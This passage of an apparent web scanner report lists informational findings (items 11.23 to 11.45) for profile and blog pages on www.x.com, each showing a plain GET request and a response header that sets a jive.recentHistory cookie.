<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.23. https://www.x.com/people/PayPal_ToddS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323839313b332c323430323b332c3133363236393b332c3133313833303b332c31323739393b332c3133373331333b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.24. https://www.x.com/people/Praveen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.25. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35353331393b332c35333437343b332c323030383b332c35333436333b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.26. https://www.x.com/people/RightWayMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.27. https://www.x.com/people/S.Aijaz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132393239303b332c3134303635343b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.28. https://www.x.com/people/SRS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.29. https://www.x.com/people/Saleem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.30. https://www.x.com/people/Shade8934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133373131353b332c3133363935343b332c3133383538323b332c35333735313b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.31. https://www.x.com/people/Suneetha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.32. https://www.x.com/people/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.33. https://www.x.com/people/amypiazza00  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.34. https://www.x.com/people/angelleye  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.35. https://www.x.com/people/billday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.36. https://www.x.com/people/blingnation2010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.37. https://www.x.com/people/bryngregory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.38. https://www.x.com/people/das_licht  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373331333b332c3132393239303b332c39313330313b332c3132323335343b332c3133393730313b332c3134303635343b332c3133373135383b332c3133343430323b332c34383739343b332c31303737303b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.39. https://www.x.com/people/dchankhour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.40. https://www.x.com/people/eferreira  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133343430323b332c34383739343b332c39313330313b332c3134303635343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.41. https://www.x.com/people/encore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.42. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.43. https://www.x.com/people/gazugafan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.44. https://www.x.com/people/gem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.45. https://www.x.com/people/gogoeric  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
